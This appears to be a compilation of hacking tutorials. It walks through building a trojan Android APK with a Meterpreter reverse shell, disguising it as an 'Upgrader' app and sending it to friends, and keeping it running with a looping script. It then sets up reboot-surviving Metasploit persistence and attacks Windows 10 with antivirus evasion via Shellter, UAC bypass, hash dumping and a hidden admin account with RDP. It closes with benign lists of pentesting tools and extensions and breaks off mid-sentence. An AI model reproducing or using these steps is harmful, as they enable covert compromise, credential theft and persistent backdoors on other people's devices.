Hack Android Using Kali

(Remotely)
Hello Hackers! Welcome to my 2nd Post:
This is a tutorial explaining how to hack android phones with Kali.
I can't see any tutorials explaining this Hack/Exploit, so, I made one.
(Still ,you may already know about this)
Step 1 Fire-Up Kali:
 Open a terminal, and make a Trojan .apk
 You can do this by typing :
 msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R >
/root/Upgrader.apk (replace LHOST with your own IP)
 You can also hack android on WAN i.e. through Interet by using
your Public/External IP in the LHOST and by port forwarding (ask me about
port forwarding if you have problems in the comment section)

Step 2 Open Another Terminal:

 Open another terminal until the file is being produced.
 Load metasploit console, by typing : msfconsole
Step 3 Set-Up a Listener:
 After it loads(it will take time), load the multi-handler exploit by typing : use
exploit/multi/handler

 Set up a (reverse) payload by typing : set payload

android/meterpreter/reverse_tcp
 To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN
type your private/internal IP here not the public/external)

Step 4Exploit!
 At last type: exploit to start the listener.
 Copy the application that you made (Upgrader.apk) from the root folder, to you
android phone.

 Then send it using uploading it to Dropbox or any sharing website

(like: www.speedyshare.com).
 Then send the link that the Website gave you to your friends and exploit their
phones (Only on LAN, but if you used the WAN method then you can use the
exploit anywhere on the INTERNET)
  Let the Victim install the Upgrader app(as he would think it is meant to upgrade
some features on his phone)
 However, the option of allowance for Installation of apps from Unknown
Sources should be enabled (if not) from the security settings of the android phone
to allow the Trojan to install.
 And when he clicks Open...
Step 5BOOM!
There comes the meterpreter prompt:

------------------------------------------HACKED-------------------------------------------------

The END:
Keep coming for more!
Some post modules that work for windows might not work in android
For Eg: run killav, persistence (persistent backdoor) etc.
Thank You!
F.E.A.R.

Create a Persistent Back Door in

Android Using Kali Linux:
In this tutorial I am going to show you how to make the backdoor we created in my
guide here a persistent one.
I finally found out a way to do this, as I was/am very poor in bash scripting, I took
much time (20hrs approx.) to get the script working and executable, thanks to the raw
syntaxes I found out from other sites.

Step 1Fire Up Kali and Hack an Android System:

Use this guide to hack an android system on LAN.
I'll be hacking on WAN, using a VM.

 Lets Create a backdoor by typing: msfpayload android/meterpreter/reverse_tcp

LHOST=182.68.42.6 R > /root/abcde.apk

 Now, lets set-up a Listener:

 msfconsole
 use exploit/multi/handler
 set payload android/meterpreter/reverse_tcp
 set LHOST 192.168.0.4
 exploit
After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up...

Step 2Create a Persistent Script:

Here.. Copy these commands in a notepad to create a script, and save it as
anything.sh (The file extension .sh is important!)
--------------------------------------------------------------------------------------------------------
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n
com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
(Don't copy these lines "-----" also, there are no line breaks in the 3rd and the 4th line,
they are a single line)
(The first line #!/bin/bash is also important as it recognizes the script as a bash shell
script)
(You can set the sleep to any amount of seconds you want the script to sleep)
Move/Copy this to the Home/Root folder of KALI.
--------------------------------------------------------------------------------------------------------
Updated Script v3 (Compatible with any android version)
CRITICAL: DO NOT COPY/PASTE THE SCRIPT DIRECTLY, OR
IT (may) WON'T WORK /!\
..I guess, you will have to write it on your own.. (Don't ask me why..)
Code:
--------------------------------------------------------------------------------------------------------
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n
com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
There is a 'space' between 'while' and ':'
NO Multiple spaces in the script.
NO Line Break between 3rd and 4th line. (So a total of 5 lines)
Step 3Upload It to the Hacked Android System:
You need to upload the shell script to etc/init.d/ so that it is persistent even
after Reboot!
To do this, navigate to the directory using the following commands:
 cd /
Now you should be in the ROOT directory, you can check by typing:
 ls
Now type:

 cd etc
Check again by typing:

 ls

Again change directory:

  cd init.d
 ls

Here we are...

Time to Upload the Shell Script:

Do this by typing:

 upload anything.sh

What the? No! We need Root Access to complete this command! Darn!
Never-Mind:
> Lets just make the application (i.e. Main Activity) persistent until Reboot
> However, it will not be persistent after the android system on the Victim goes for a
Reboot.
> To do this upload the script anywhere in the sdcard:
 cd /
 cd /sdcard/Download
 ls
 upload anything.sh

Done! Uploaded!

Step 4Execute the Script:

Now, all we have to do is execute the script once, and then everything will be done by
the script automatically.
Drop into the system's shell by typing:
 shell
Now, navigate to the location of the script:

 cd /
 cd /sdcard/Download
 ls
Now its time for EXECUTION. Type:
 sh anything.sh

The script has been Activated! All you have to do is press ctrl+C to terminate the shell
(Don't worry the script is still running)
Reboot to eliminate the script or use Task Killer
Step 5Testing...
You can test it by exiting from meterpreter and again setting up a Listener.
You should get a meterpreter prompt automatically!
PROOF:
Wow! It happened so Fast that 3 sessions got opened one after another.
(I know that the above picture shows that I am hacking on LAN instead of WAN as my
Public IP is dynamic and my router had some technical problems, so it kept rebooting
itself, so I showed t on LAN, BUT no worries I have tested it on WAN, works Fine )
The END:
Yes! Finally a persistent backdoor has been created successfully for Android systems.

Things to Remember:
 The persistence of the backdoor will only remain until a reboot of the android
system.
 If you are hacking on WAN and you have a dynamic Public IP, then, the
persistence will only remain until your router reboots/your IP changes.
 Remember to reboot the android to eliminate the running script, if you are
testing on you own Android System.
 If the Victim's Android system is Rooted and your Public IP is Static, then:
1) The Persistence will remain forever on WAN!
2) The Persistence will remain forever on LAN Obviously

Good-Bye Hackers!
Keep Coming For More!
I'll be waiting for Your Likes and Comments,

Thank You,
F.E.A.R.
How to Remotely Install an Auto-
Reconnecting Persistent Back Door
on Someone's PC
Most of my recent posts have addressed using Metasploit's Meterpreter and what we can
do once we have embedded it on the victim's system. This includes remotely installing a
keylogger, enabling the webcam, enabling the microphone and recording, disabling the
antivirus software, among many other things. The list is almost unlimited.
Unfortunately, the Meterpreter ceases to work if the victim system is rebooted. As a result,
many of you have written me asking whether we can maintain or persist the Meterpreter
on the victim system.

The answer is an unequivocal "Yes!"

We can embed the Meterpreter and then come back later—even after the victim's
computer has been rebooted—and reconnect to our little backdoor or listener. I'm
dedicating this post to showing you how to do this.

Getting Started
Let's assume that you have been successful in embedding the Meterpreter on the victim's
system, and that you have a screen that looks like the screenshot below. If you're not sure
how to do this, check out some of my previous posts for help.
Now, let's get started.

Step 1 Run the Persistence Script

Metasploit has a script named persistence that can enable us to set up a persistent
Meterpreter (listener) on the victim's system. First let's take a look at the options that are
available when we run this scrip by using the –h switch.
At the Meterpreter prompt, type the following:
meterpreter > run persistence -h

We can see in the screenshot above that...

 –A switch starts a matching handler to connect to the agent.

 With the -L switch we tell the system where to place the Meterpreter on the target
system.
 The –P switch tells the system what payload to use
(Windows/Meterpreter/reverse_tcp is the default, so we won't use this switch).
 -S starts the agent on boot with system privileges.
 The -U switch starts the agent when the user (U) logs on.
 The -x switch starts the agent when the system boots.
 With the –i switch we can indicate the time interval between each connection
attempt.
 The -p switch indicates the port, and finally...
 The –r switch indicates the IP address of our ( r ) system running Metasploit.
Here we will use the –A, -L, -x, -i, -p, and –r switches.
Type at the Meterpreter prompt:
meterpreter >run persistence –A –L c:\\ -X 30 –p 443 –r 192.168.1.113
This command then will run the persistence script that will start a matching handler (-A),
place the Meterpreter at c:\\ on the target system (-L c:\\), starts the listener when the
system boots (-x), checks every 30 seconds for a connection (-i 30), connects on port 443
(-p 443), and connects to the local system (ours) on IP address 192.168.1.113.
When we run this command, this is what we should see.

Step 2 Opening a Second Session

We can see that we have opened a Meterpreter session on the victim system.

We return to our Metasploit prompt, by typing:

meterpreter > background

This will return us to the msf prompt, where can now type:
msf exploit(ms08_067_netapi) > sessions –i
We see above that now we have two or more sessions running on the victim system (I
actually have three sessions running on this victim) as the persistent Meterpreter has
opened a second session on the system.

Step 3 Testing
This is all very nice, but the key here is whether the Meterpreter will reconnect to our
system even after the target system reboots. We can test this by typing;

meterpreter > reboot

This will reboot the target/victim machine and if we are successful, the Meterpreter will
reconnect to our system.

Even after the system reboots, the Meterpreter on the victim system attempts to connect
to us every 30 seconds until it has successfully open a session for us.

Now we have successfully opened a persistent connection on the victim system that we
can come back to time and time again to wreak havoc!

How to Attack Windows 10 Machine with

Metasploit on Kali Linux
July 30, 2018 byLester Obbayi
Share:
Introduction
The Metasploit Framework is the most commonly-used framework for hackers
worldwide. It allows hackers to set up listeners that create a conducive environment
(referred to as a Meterpreter) to manipulate compromised machines. In this article,
we’ll look at how this framework within Kali Linux can be used to attack a
Windows 10 machine. We shall do this through a malicious executable file using
Shellter.

This article assumes the installation of Kali Linux has been done and is reachable
through a bridged connection from a Windows machine on VirtualBox.

We made simulated phishing training easy

Get a first-hand look at the training content, phishing simulations and integrations
that make Infosec IQ an industry leader.
GET STARTED
Creating a Malicious .exe File
To create the executable, you would use msfvenom as shown in the command
below:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f

exe LHOST=192.168.100.4 LPORT=4444 -o /root/something32.exe

The command above instructs msfvenom to generate a 32-bit Windows executable

file that implements a reverse TCP connection for the payload. The format must be
specified as being type .exe, and the local host (LHOST) and local port (LPORT)
have to be defined. In our case, the LHOST is the IP address of our attacking Kali
Linux machine, and the LPORT is the port to listen on for a connection from the
target once it has been compromised.

To obtain our IP address we use the ifconfig command within Kali, specifying the
interface as eth0 (since we are on Ethernet) as shown below.
The screenshot below shows the output of the command on successful .exe
generation.

Antivirus solutions work by detecting malicious signatures within executables. Our

file will thus be flagged as malicious once within the Windows environment. We
therefore have to figure out a way to modify it to bypass antivirus detection. We
will encode it to make it fully undetectable, or FUD.

Making the Executable FUD (Fully

Undetectable)
To encode our executable, we shall be using Shellter. Shellter works by changing
the executable’s signatures from the obviously malicious one to a completely new
and unique one that can bypass detection.

Note that antiviruses also check the behavior of executables and employ techniques
such as heuristics scanning, so they are not just limited to checking for signatures.
During our lab tests we discovered that Windows Defender, which ships by default
with Windows 10, flagged the executable 6 out of the 10 times we used Shellter to
perform the encoding. This is despite Windows 10 being a fresh download with
latest patches applied! You will be better off purchasing Shellter Pro (or any Pro
Crypter) or writing your own Crypter to avoid antivirus flagging your executables.

Also note that when writing your own, disable automatic submissions. Otherwise
whatever you write, if detected as potentially-unwanted software, will be uploaded
by your antivirus for analysis … And we both know how that will end.

Let’s look at how to install and run Shellter.

On your Kali Linux, download Shellter with the command below:

sudo apt-get install shellter

To launch Shellter just type shellter on the terminal.

You will be required to enter the absolute path to the executable to make FUD.
Make sure to select “Auto” mode as shown below.

Shellter will then initialize and run some checks. It will then prompt you whether to
run in stealth mode. Select “Y” for yes.

The next prompt will require you to enter the payload, either a custom or a listed
one. You should select a listed one by typing “L”, unless you want to proceed with
your own custom payload. Select the index position of the payload to use. We need
a Meterpreter_Reverse_TCP, so we will have to go with “1.”
Enter LHOST and LPORT and press Enter. Shellter will run to completion and
request you to press Enter.

At this point, the executable you provided will have been made undetectable to
antivirus solutions.
Again, note that you are better off writing your own or purchasing a Crypter that is
constantly being revised. Otherwise, most of your encoding will be flagged as
malicious or potentially unwanted software.

We now need to set up a listener on the port we determined within the executable.
We do this by launching Metasploit using the command msfconsole on the Kali
Linux terminal.

The screenshot below shows what commands to issue within Metasploit. First, we’ll
tell Metasploit to use the generic payload handler “multi/handler” using the
command use multi/handler. We will then set the payload to match the one set
within the executable using the command set payload
windows/meterpreter/reverse_tcp. We will then set the LHOST and LPORT this
way — set LHOST 192.168.100.4 and set LPORT 4444. Once done, type “run” or
“exploit” and press Enter.

The screenshot below displays the output. The reverse TCP handler should begin
waiting for a connection.

The next step is to execute it from a Windows perspective. In a real-world practical

situation, this will require social engineering skills. Nevertheless, copy the
something32 to a Windows system within the same network as the Kali system.

Executing the Payload

On copying the file to our target Windows machine, we have the screen-shot below.
Execute the file.
The executable causes the payload to be executed and connect back to the attacking
machine (Kali Linux). Immediately, we receive a Meterpreter session on our Kali
Linux. This is demonstrated by the Meterpreter > prompt as shown below:

Since the file was not run as “administrator,” there are Meterpreter commands that
can’t be run as they would result in an “access denied” response. This can be
confirmed by running the getuid command, which tells us that we are running as
user l3s7r0z.

To prove that the user lacks enough privileges, we attempted to run the
command mimikatz_command -f sekurlsa::logonPasswords.

The result is an “Access is denied” message as shown below:

In order to gain sufficient rights, we need to perform a UAC bypass. Next we see
how this can be done.

Privilege Escalation
Privilege escalation allows us to elevate privileges from our less privileged user
(l3s7r0z) to a more privileged one, preferably the SYSTEM user, which has all
administrative rights.

Metasploit by default provides us with some methods that allow us to elevate our
privileges. On the Meterpreter prompt we use the getsystem command, as shown
below:

Since the
methods used by getsystem all fail, we need an alternative method of elevating
privileges. We will use the comhijack exploit module that is used to bypass User
Access Control. To do so, we “background” our Meterpreter session, switch our
exploit from multi/handler to windows/local/bypassuac_comhijack and
implement this on the session in the background using set SESSION 2.

This is shown below:

We then set the payload using set payload

windows/x64/meterpreter/reverse_tcp and set the LPORT and LHOST. We then
run the exploit.
We successfully receive a Meterpreter session. Typing sysinfo shows us the
information of our target. getuid shows that we are running as user l3s7r0z on
Windows 10, but we can elevate to SYSTEM by issuing getsystem. We can see that
elevation was successful and we can confirm this by issuing getuid again, we can
see we are now NT AUTHORITYSYSTEM.

With these privileges, we can do quite a lot on our compromised target. For
instance, we can obtain LM and NTLM password hashes using
the hashdump command as shown above. Note that the format of the hashes above
is USERNAME:SID:LM_HASH:NTLM_HASH:::. We can even obtain
credentials from browsers, key managers, the domain controller, perform
keylogging, capture screenshots and even stream from the webcam (this will not
work on VM, it will need an actual native Windows install target).
Now that we are within the target machine, why not perform some persistence to
remain within?

Persistence
Persistence allows us to gain access back to the machine whenever we need to even
when the target decides to patch the vulnerability.

There are many ways of performing persistence. For example, we can code a
malicious virus to always connect back to us whenever the target turns on their
machine (this is called a backdoor), or even have our own user accounts within the
compromised target machine. Metasploit also provides its method of persistence,
discussed here.

Today, we’ll go with the second option, to have our own account within the target
and enable RDP so that whenever we want, we can log into the machine and access
the information we want.

Remember the NTLM hashes we were able to obtain above using

the hashdump command from the mimikatz module? We can even log into any
account within the target machine using any password hashes, impersonate
legitimate users and download, alter or upload files.

On the Meterpreter session, we type the command shell to drop into a Windows
shell on the Windows 10 target.
At the C:WINDOWSsystem32> prompt, we issue the net users command. This
lists all the users within the windows machine. As we can see, there are only two
users, the Administrator and the l3s7r0z user.

We add a new user Jaime and give him the password Bru73f0rc3_

The command used to do that is:

net user /add jaime Bru73f0rc3_

We then add Jaime to the administrators group so that the account can perform
admin functions. The command used is:

net localgroup administrators jaime /add

We then add him to the RDP group. This will allow us to log in through RDP to the
target machine, even after it has been patched to have firewall and antivirus on.

The command used is:

net localgroup “Remote Desktop Users” jaime /add

After all the setup is done for user Jaime, we can use the following command to see
the user’s properties:

net user jaime

The screenshot below shows the output of the command.

In some cases RDP is not enabled at the target machine. As long as we are within
the shell, we can enable it by adding a registry key.

To enable RDP, use the following command:

reg add
“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal
Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

If you would like to disable RDP for whatever purpose, you can do so by typing the
following command:

reg add
“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal
Server” /v fDenyTSConnections /t REG_DWORD /d 1 /f

The result of the operation is shown below:

From the Kali Linux machine, we can use the remmina remote connection client. If
it is not installed within Kali, you can install it by typing the following command:

apt-get install remmina

Start remmina by typing remmina on the command prompt. And connect to the
target using its IP address.

You will be required to accept a certificate. Do so and use the username and
password used to register the Jaime account. That is:

Username: jaime

Password: Bru73f0rc3_

By default, in Windows 10, the logged-in user using Windows 10 will be required
to allow you to connect. However, if they do not respond within 30 seconds, they
are automatically logged out.
Conclusion
In this article we have seen how the Metasploit Framework can be used to
compromise a Windows 10 machine to gain a Meterpreter session. We have used
Shellter to FUD our malicious executable to bypass the Windows 10 antivirus and
performed privilege escalation to gain more rights on our compromised machine.

Hackers are not limited in what they can use the framework for. For instance, it can
also be used to perform information gathering and pivoting through compromised
networks.

17 Best Security Penetration

Testing Tools The Pros Use
Are you seeking the best penetration testing tool for your needs? We have you covered.

Penetration testing tools are software applications used to check for network security
threats.

Each application on this list provides unique benefits. Easy comparison helps you
determine whether the software is the right choice for your business. Let’s dive in and
discover the latest security software options on the market.
What Is Penetration Testing?
Penetration testing, also known as pen testing, means computer securities experts use
to detect and take advantage of security vulnerabilities in a computer application.
These experts, who are also known as white-hat hackers or ethical hackers, facilitate
this by simulating real-world attacks by criminal hackers known as black-hat hackers.

In effect, conducting penetration testing is similar to hiring security consultants to

attempt a security attack of a secure facility to find out how real criminals might do it.
The results are used by organizations to make their applications more secure.

How Penetration Tests Work

First, penetration testers must learn about the computer systems they will be
attempting to breach. Then, they typically use a set of software tools to find
vulnerabilities. Penetration testing may also involve social engineering hacking
threats. Testers will try to gain access to a system by tricking a member of an
organization into providing access.
Penetration testers provide the results of their tests to the organization, which are then
responsible for implementing changes that either resolve or mitigate the
vulnerabilities.

Types of Penetration Tests

Penetration testing can consist of one or more of the following types of tests:

White Box Tests

A white box test is one in which organizations provide the penetration testers with a
variety of security information relating to their systems, to help them better find
vulnerabilities.

Blind Tests
A blind test, known as a black-box test, organizations provide penetration testers with
no security information about the system being penetrated. The goal is to expose
vulnerabilities that would not be detected otherwise.
Double-Blind Tests
A double-blind test, which is also known as a covert test, is one in which not only do
organizations not provide penetration testers with security information. They also do
not inform their own computer security teams of the tests. Such tests are typically
highly controlled by those managing them.

External Tests
An external test is one in which penetration testers attempt to find vulnerabilities
remotely. Because of the nature of these types of tests, they are performed on
external-facing applications such as websites.

Internal Tests
An internal test is one in which the penetration testing takes place within an
organization’s premises. These tests typically focus on security vulnerabilities that
someone working from within an organization could take advantage of.

Top 10 Browser Extensions for Ethical

Hackers
1 year ago
by Usama Azad
Ethical hacking is not just a single skill, it is a whole set of skills and among these
skills includes the usage of different tools for different techniques to work faster and
with less effort.
Today we will discuss about the browser extensions that every ethical hacker should
use to make its life and hacking a lot easier than before, and we will be talking about
the best among them and the purpose of each of them. Some of these extensions will
be Chrome-based only, others will be Firefox-based only and some of these will be
available for both.

Now let’s start with those browser extensions:

Tamper Data
Tamper Data allows you to monitor and modify http, https and other web browser
requests and responses which are not generally shown to you. If you have ever used
burp suite, you will get a better understanding that tamper data is like a smaller
version of burp suite within browser. Most of the ethical hacking is based upon
fuzzing and for that we often need to change or modify inputs and requests and we
can use this browser extension for this purpose. Tamper Data is for both Chrome and
Firefox. Similar extensions include ‘Request Maker’, ‘EditThisCookie’ and ‘Live
HTTP Headers’.

Link(Firefox): https://addons.mozilla.org/en-US/firefox/addon/tamper-data-for-
ff-quantum/
Link(Chrome): https://chrome.google.com/webstore/detail/tamper-chrome-
extension/hifhgpdkfodlpnlmlnmhchnkepplebkb?hl=en
Wappalyzer
In web application penetration testing, we need to gather information about its
domain, hardware and software such as what OS is running on server and of what
version? This process is known as information gathering or banner grabbing. This
process is helpful to take advantage of Common Vulnerabilities and Exposures
(CVE). Wappalyzer is the browser extension for this purpose, i.e., it extracts out
important information about the web application that can be useful in pentesting it.
Wappalyzer extension is available for both Chrome and Firefox. Similar extensions
for this kind of information gathering are ‘Firebug’ and ‘IP Address and Domain
Info’.

Link(Firefox): https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/
Link(Chrome): https://chrome.google.com/webstore/detail/wappalyzer/gppongm
hjkpfnbhagpmjfkannfbllamg?hl=en
Proxy SwitchySharp
No one better than ethical hackers can appreciate the importance of a reliable proxy
and Proxy SwitchySharp extension not only provides that proxy but it also provides
additional features that help a lot in ethical hacking as well as for other technical
users. Proxy SwitchySharp has a feature of tab switching proxies which changes its
proxy configurations based upon the URL requested, which means you can use
multiple different proxies for multiple different websites at the same time without the
hassle of handling it manually. Proxy SwitchySharp is for Chrome only. Among
proxy extensions, ‘FoxyProxy’ has also earned its name as a proxy manager.

Link(Chrome): https://chrome.google.com/webstore/detail/proxy-
switchysharp/dpplabbmogkhghncfbfdeeokoefdjegm?hl=en
HackBar
HackBar provides an ease of access and interface to web pentesting. It can be used for
ease in SQL injection, XSS and other attacks as it gives user-friendly space for
fuzzing inputs and URLs. Along with an interface, it also helps in SQL functions,
XSS queries, encoding, decoding, hash generation, etc. Furthermore, it helps in easily
reading, copying and requesting URLs so that you can easily pentest or test any web
application. This extension is for both Chrome as well as for Firefox.

Link(Firefox): https://addons.mozilla.org/en-US/firefox/addon/hackbartool/
Link(Chrome): https://chrome.google.com/webstore/detail/hackbar/ejljggkpbkch
hfcplgpaegmbfhenekdc?hl=en
Open Port Check Tool
As its name suggests, Open Port Check Tool detects any open ports on the current
computer to alert the user to turn off any unused port and minimize any attacking
possibility. This is quite helpful in pentesting as unused open ports are not
recommended and are considered to be an invite for an attacker to exploit any
vulnerability on that port. It is an extension for Chrome users only.

Link(Chrome):
https://chrome.google.com/webstore/detail/open-port-check-
tool/lefghalnfhaklfbndadklndcndabkadb
Bishop Vulnerability Scan
This extension is a vulnerability scanner for websites. It scans for different common
vulnerabilities like misconfigured files, exposed version control systems, parent and
child directory transversal on the sites that you target. This tool automatically checks
for these basic vulnerabilities in the sites, running in the background. It is made for
testing purposes on your site or if you have authorisation to scan a particular site. HPP
Finder is another web vulnerability testing browser extension which specially checks
for HTTP Parameter Poisoning (HPP) exploits. Bishop Vulnerability Scan is a
chrome-based extension.

Link(Chrome):
https://chrome.google.com/webstore/detail/bishop-vulnerability-
scan/cbkdeoaaclnbidadjimofnhpbfhjakoe
OffSec Exploit-db Search
This extension is not an exploiter but it searches for exploits from the maintained
database of exploits by offensive security named as exploit-db. You can search for all
kinds of exploits for many different platforms. This database not only provides
information about the exploits but also provides payloads for some exploits and other
stuff related to some exploits as well and hence this browser extension searches
through this database of exploits. This extension is on firefox browser only.
Link(Firefox): https://addons.mozilla.org/en-US/firefox/addon/offsec-exploit-db-
search/
Site Spider Mark II
It extracts all the publicly accessible links used in a site and is used to search and find
broken links in a website. Site Spider Mark II also shows you the whole list of links
that it finds to refer to. Site Spider extension is for chrome users. You can find this
extension at:

Link(Chrome):
https://chrome.google.com/webstore/detail/site-spider-mark-
ii/gedjofgioahckekhpgknhchelbpdogok?hl=en
Note Anywhere:
Ethical Hacking for web applications starts with collecting basic to advance
information about the targeted websites and ethical hackers normally use different
word processors to save that information and load quickly whenever needed. Note
Anywhere makes it much easier for them to quickly save and load that information as
it allows users to write anywhere on the website at realtime and bring back those
saved notes whenever needed or the user visits that website again. It also shows the
number of notes created on that particular page and other than this, you can import,
export and share these notes for your ease. This extension is for chrome users.

Link(Chrome):
https://chrome.google.com/webstore/detail/note-
anywhere/bohahkiiknkelflnjjlipnaeapefmjbh
D3coder:
D3coder is chrome-based browser extension which instantly encrypts and decrypts
text and hashes using different encryption standards. It also uses a dictionary to crack
common hashes. Other than encryption and decryption, it also supports encoding and
decoding like base64 encoding. It is often useful as there is always a need of instantly
encoding and decoding keys and hashes for ethical hackers.

Link(Chrome):
https://chrome.google.com/webstore/detail/d3coder/gncnbkghencmkfgeepfaonme
gemakcol?hl=en
[Bonus] Penetration Testing Kit
Penetration Testing Kit is an extension bundled up with helping in many penetration
testing techniques for ethical hackers. It provides an interface for sending and viewing
request and response information. Moreover, you can build your own requests and use
 it for SQL injection, XSS and other form related vulnerability by using it as a request
builder and viewing its response. This is a chrome-based extension.

Link(Chrome):
https://chrome.google.com/webstore/detail/penetration-testing-
kit/ojkchikaholjmcnefhjlbohackpeeknd?hl=en-GB
Conclusion
This was all for this article, hope that this was helpful for you and it gave a good
insight and knowledge about useful browser extensions and also that you will use this
knowledge to do good.

Top Penetration Testing Software & Tools

1. Netsparker
Netsparker Security Scanner is a popular automatic web application for penetration
testing. The software can identify everything from cross-site scripting to SQL
injection. Developers can use this tool on websites, web services, and web
applications.

The system is powerful enough to scan anything between 500 and 1000 web
applications at the same time. You will be able to customize your security scan with
attack options, authentication, and URL rewrite rules. Netsparker automatically takes
advantage of weak spots in a read-only way. Proof of exploitation is produced. The
impact of vulnerabilities is instantly viewable.

Benefits:
 Scan 1000+ web applications in less than a day!
 Add multiple team members for collaboration and easy shareability of findings.
 Automatic scanning ensures a limited set up is necessary.
 Searches for exploitable SQL and XSS vulnerabilities in web applications.
 Legal web application and regulatory compliance reports.
 Proof-based scanning Technology guarantees accurate detection.

2. Wireshark
Once known as Ethereal 0.2.0, Wireshark is an award-winning network analyzer with
600 authors. With this software, you can quickly capture and interpret network
 packets. The tool is open-source and available for various systems, including
Windows, Solaris, FreeBSD, and Linux.

Benefits:
 Provides both offline analysis and live-capture options.
 Capturing data packets allows you to explore various traits, including source and
destination protocol.
 It offers the ability to investigate the smallest details for activities throughout a
network.
 Optional adding of coloring rules to the pack for rapid, intuitive analysis.

3. Metasploit
Metasploit is the most used penetration testing automation framework in the world.
Metasploit helps professional teams verify and manage security assessments,
improves awareness, and arms and empowers defenders to stay a step ahead in the
game.

It is useful for checking security and pinpointing flaws, setting up a defense. An Open
source software, this tool will allow a network administrator to break in and identify
fatal weak points. Beginner hackers use this tool to build their skills. The tool
provides a way to replicates websites for social engineers.

Benefits:
 Easy to use with GUI clickable interface and command line.
 Manual brute-forcing, payloads to evade leading solutions, spear phishing, and
awareness, an app for testing OWASP vulnerabilities.
 Collects testing data for over 1,500 exploits.
 MetaModules for network segmentation tests.
 You can use this to explore older vulnerabilities within your infrastructure.
 Available on Mac Os X, Windows and Linux.
 Can be used on servers, networks, and applications.

4. BeEF
This is a pen testing tool and is best suited for checking a web browser. Adapted for
combating web-borne attacks and could benefit mobile clients. BeEF stands for
Browser Exploitation Framework and uses GitHub to locate issues. BeEF is designed
to explore weaknesses beyond the client system and network perimeter. Instead, the
framework will look at exploitability within the context of just one source, the web
browser.
 Benefits:
 You can use client-side attack vectors to check security posture.
 Connects with more than one web browser and then launch directed command
modules.

5. John The Ripper Password Cracker

Passwords are one of the most prominent vulnerabilities. Attackers may use
passwords to steal credentials and enter sensitive systems. John the Ripper is the
essential tool for password cracking and provides a range of systems for this purpose.
The pen testing tool is a free open source software.

Benefits:
 Automatically identifies different password hashes.
 Discovers password weaknesses within databases.
 Pro version is available for Linux, Mac OS X, Hash Suite, Hash Suite Droid.
 Includes a customizable cracker.
 Allows users to explore documentation online. This includes a summary of changes
between separate versions.

6. Aircrack
Aircrack NG is designed for cracking flaws within wireless connections by capturing
data packets for an effective protocol in exporting through text files for analysis.
While the software seemed abandoned in 2010, Aircrack was updated again in 2019.

This tool is supported on various OS and platforms with support for WEP dictionary
attacks. It offers an improved tracking speed compared to most other penetration tools
and supports multiple cards and drivers. After capturing the WPA handshake, the suite
is capable of using a password dictionary and statistical techniques to break into WEP.

Benefits:
 Works with Linux, Windows, OS X, FreeBSD, NetBSD, OpenBSD, and Solaris.
 You can use this tool to capture packets and export data.
 It is designed for testing wifi devices as well as driver capabilities.
 Focuses on different areas of security, such as attacking, monitoring, testing, and
cracking.
 In terms of attacking, you can perform de-authentication, establish fake access points,
and perform replay attacks.
 7. Acunetix Scanner
Acutenix is an automated testing tool you can use to complete a penetration test. The
tool is capable of auditing complicated management reports and issues with
compliance. The software can handle a range of network vulnerabilities. Acunetix is
even capable of including out-of-band vulnerabilities.

The advanced tool integrates with the highly enjoyed Issue Trackers and WAFs. With
a high-detection rate, Acunetix is one of the industry’s advanced Cross-site scripting
and SQLi testing, which includes sophisticated advanced detection of XSS.

Benefits:
 The tool covers over 4500 weaknesses, including SQL injection as well as XSS.
 The Login Sequence Recorder is easy-to-implement and scans password-protected
areas.
 The AcuSensor Technology, Manual Penetration tools, and Built-in Vulnerability
Management streamline black and white box testing to enhance and enable
remediation.
 Can crawl hundreds of thousands of web pages without delay.
 Ability to run locally or through a cloud solution.

8. Burp Suite Pen Tester

There are two different versions of the Burp Suite for developers. The free version
provides the necessary and essential tools needed for scanning activities. Or, you can
opt for the second version if you need advanced penetration testing. This tool is ideal
for checking web-based applications. There are tools to map the tack surface and
analyze requests between a browser and destination servers. The framework uses Web
Penetration Testing on the Java platform and is an industry-standard tool used by the
majority of information security professionals.

Benefits:
 Capable of automatically crawling web-based applications.
 Available on Windows, OS X, Linux, and Windows.

9. Ettercap
The Ettercap suite is designed to prevent man in the middle attacks. Using this
application, you will be able to build the packets you want and perform specific tasks.
The software can send invalid frames and complete techniques which are more
difficult through other options.
 Benefits:
 This tool is ideal for deep packet sniffing as well as monitoring and testing LAN.
 Ettercap supports active and passive dissection of protections.
 You can complete content filtering on the fly.
 The tool also provides settings for both network and host analysis.

10. W3af
W3af web application attack and audit frameworks are focused on finding and
exploiting vulnerabilities in all web applications. Three types of plugins are provided
for attack, audit, and discovery. The software then passes these on to the audit tool to
check for flaws in the security.

Benefits:
 Easy to use for amateurs and powerful enough for developers.
 It can complete automated HTTP request generation and raw HTTP requests.
 Capability to be configured to run as a MITM proxy.

11. Nessus
Nessus has been used as a security penetration testing tool for twenty years. 27,000
companies utilize the application worldwide. The software is one of the most
powerful testing tools on the market with over 45,000 CEs and 100,000 plugins.
Ideally suited for scanning IP addresses, websites and completing sensitive data
searches. You will be able to use this to locate ‘weak spots’ in your systems.

The tool is straightforward to use and offers accurate scanning and at the click of a
